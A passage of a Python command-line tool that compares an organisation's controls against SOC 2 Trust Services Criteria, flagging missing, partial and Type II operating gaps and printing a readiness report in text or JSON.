if tsc not in covered_tsc:
covered_tsc[tsc] = []
covered_tsc[tsc].append(ctrl)
gaps = []
partial = []
covered = []
for cat in categories:
if cat not in REQUIRED_TSC:
continue
for tsc_id, tsc_desc in REQUIRED_TSC[cat].items():
if tsc_id not in covered_tsc:
gaps.append(
{
"tsc_criteria": tsc_id,
"description": tsc_desc,
"category": cat,
"gap_type": "missing",
"severity": "critical" if cat == "security" else "high",
"remediation": f"Implement control(s) addressing {tsc_id}: {tsc_desc}",
}
)
else:
ctrls = covered_tsc[tsc_id]
# Check for partial implementation
has_issues = False
for ctrl in ctrls:
status = ctrl.get("status", "").lower()
if status in ("not started", "not_started", ""):
has_issues = True
owner = ctrl.get("owner", "TBD")
if owner in ("TBD", "", "N/A"):
has_issues = True
if has_issues:
partial.append(
{
"tsc_criteria": tsc_id,
"description": tsc_desc,
"category": cat,
"gap_type": "partial",
"severity": "medium",
"controls": [c.get("control_id", "N/A") for c in ctrls],
"remediation": f"Complete implementation and assign owners for {tsc_id} controls",
}
)
else:
covered.append(
{
"tsc_criteria": tsc_id,
"description": tsc_desc,
"category": cat,
"controls": [c.get("control_id", "N/A") for c in ctrls],
}
)
return gaps, partial, covered
def analyze_type2_gaps(controls: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""Additional gap analysis for Type II operating effectiveness."""
type2_gaps = []
for ctrl in controls:
ctrl_id = ctrl.get("control_id", "N/A")
issues = []
# Check for evidence date coverage
evidence_date = ctrl.get("evidence_date", "")
if not evidence_date:
issues.append(
{
"check": "evidence_period",
"severity": "critical",
"detail": "No evidence date recorded",
}
)
# Check owner assignment
owner = ctrl.get("owner", "TBD")
if owner in ("TBD", "", "N/A"):
issues.append(
{
"check": "owner_accountability",
"severity": "medium",
"detail": "No control owner assigned",
}
)
# Check status for operating evidence
status = ctrl.get("status", "").lower()
if status not in ("collected", "complete", "done"):
issues.append(
{
"check": "operating_consistency",
"severity": "critical",
"detail": f"Control status is '{ctrl.get('status', 'Not Started')}' — operating evidence needed",
}
)
# Check frequency is defined
frequency = ctrl.get("frequency", "")
if not frequency:
issues.append(
{
"check": "frequency_adherence",
"severity": "critical",
"detail": "No control frequency defined",
}
)
if issues:
type2_gaps.append(
{
"control_id": ctrl_id,
"tsc_criteria": ctrl.get("tsc_criteria", "N/A"),
"description": ctrl.get("description", "N/A"),
"issues": issues,
}
)
return type2_gaps
def build_report(
controls: List[Dict[str, Any]],
audit_type: str,
categories: List[str],
gaps: List[Dict],
partial: List[Dict],
covered: List[Dict],
type2_gaps: List[Dict],
) -> Dict[str, Any]:
"""Build the complete gap analysis report."""
total_criteria = sum(
len(REQUIRED_TSC[c]) for c in categories if c in REQUIRED_TSC
)
covered_count = len(covered)
gap_count = len(gaps)
partial_count = len(partial)
coverage_pct = (
round(covered_count / total_criteria * 100, 1) if total_criteria > 0 else 0
)
critical_gaps = len([g for g in gaps if g.get("severity") == "critical"])
if coverage_pct >= 90 and critical_gaps == 0:
readiness = "Ready"
elif coverage_pct >= 75:
readiness = "Near Ready — address gaps before audit"
elif coverage_pct >= 50:
readiness = "Significant work needed"
else:
readiness = "Not ready — major build-out required"
report = {
"report_metadata": {
"audit_type": audit_type,
"categories_assessed": categories,
"report_date": datetime.now().strftime("%Y-%m-%d"),
"total_controls_assessed": len(controls),
},
"coverage_summary": {
"total_criteria": total_criteria,
"covered": covered_count,
"partially_covered": partial_count,
"missing": gap_count,
"coverage_percentage": coverage_pct,
"critical_gaps": critical_gaps,
"readiness_assessment": readiness,
},
"gaps": gaps,
"partial_implementations": partial,
"covered_criteria": covered,
}
if audit_type == "type2":
type2_issue_count = sum(len(g["issues"]) for g in type2_gaps)
report["type2_operating_gaps"] = {
"controls_with_issues": len(type2_gaps),
"total_issues": type2_issue_count,
"details": type2_gaps,
}
return report
def format_text_report(report: Dict[str, Any]) -> str:
"""Format the gap analysis report as human-readable text."""
lines = [
"=" * 65,
"SOC 2 Gap Analysis Report",
"=" * 65,
"",
]
meta = report["report_metadata"]
lines.append(f"Audit Type: {meta['audit_type'].upper()}")
lines.append(f"Report Date: {meta['report_date']}")
lines.append(f"Categories: {', '.join(meta['categories_assessed'])}")
lines.append(f"Controls: {meta['total_controls_assessed']}")
lines.append("")
# Coverage summary
cov = report["coverage_summary"]
lines.append("--- Coverage Summary ---")
lines.append(f" Total TSC Criteria: {cov['total_criteria']}")
lines.append(f" Fully Covered: {cov['covered']}")
lines.append(f" Partially Covered: {cov['partially_covered']}")
lines.append(f" Missing: {cov['missing']}")
lines.append(f" Coverage: {cov['coverage_percentage']}%")
lines.append(f" Critical Gaps: {cov['critical_gaps']}")
lines.append(f" Readiness: {cov['readiness_assessment']}")
lines.append("")
# Gaps
gaps = report.get("gaps", [])
if gaps:
lines.append(f"--- Missing Controls ({len(gaps)}) ---")
for g in gaps:
sev = g["severity"].upper()
lines.append(
f" [{sev}] {g['tsc_criteria']}: {g['description']}"
)
lines.append(f" Remediation: {g['remediation']}")
lines.append("")
# Partial
partial = report.get("partial_implementations", [])
if partial:
lines.append(f"--- Partial Implementations ({len(partial)}) ---")
for p in partial:
ctrls = ", ".join(p.get("controls", []))
lines.append(
f" [{p['severity'].upper()}] {p['tsc_criteria']}: {p['description']}"
)
lines.append(f" Controls: {ctrls}")
lines.append(f" Remediation: {p['remediation']}")
lines.append("")
# Type II operating gaps
if "type2_operating_gaps" in report:
t2 = report["type2_operating_gaps"]
lines.append(
f"--- Type II Operating Gaps ({t2['controls_with_issues']} controls, {t2['total_issues']} issues) ---"
)
for detail in t2["details"]:
lines.append(f" [{detail['control_id']}] {detail['description']}")
for issue in detail["issues"]:
lines.append(
f" - [{issue['severity'].upper()}] {issue['check']}: {issue['detail']}"
)
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="SOC 2 Gap Analyzer — identifies gaps between current controls and SOC 2 requirements."
)
parser.add_argument(
"--controls",
type=str,
required=True,
help="Path to JSON file with current controls (from control_matrix_builder.py or custom)",
)
parser.add_argument(
"--type",
type=str,
choices=["type1", "type2"],
default="type1",
help="Audit type: type1 (design only) or type2 (design + operating effectiveness)",
)
parser.add_argument(
"--json",
action="store_true",
help="Output in JSON format",
)
args = parser.parse_args()
controls = load_controls(args.controls)
categories = detect_categories(controls)
gaps, partial, covered = analyze_coverage(controls, categories)
type2_gaps = []
if args.type == "type2":
type2_gaps = analyze_type2_gaps(controls)
report = build_report(
controls, args.type, categories, gaps, partial, covered, type2_gaps
)
if args.json:
print(json.dumps(report, indent=2))
else:
print(format_text_report(report))
if __name__ == "__main__":
main()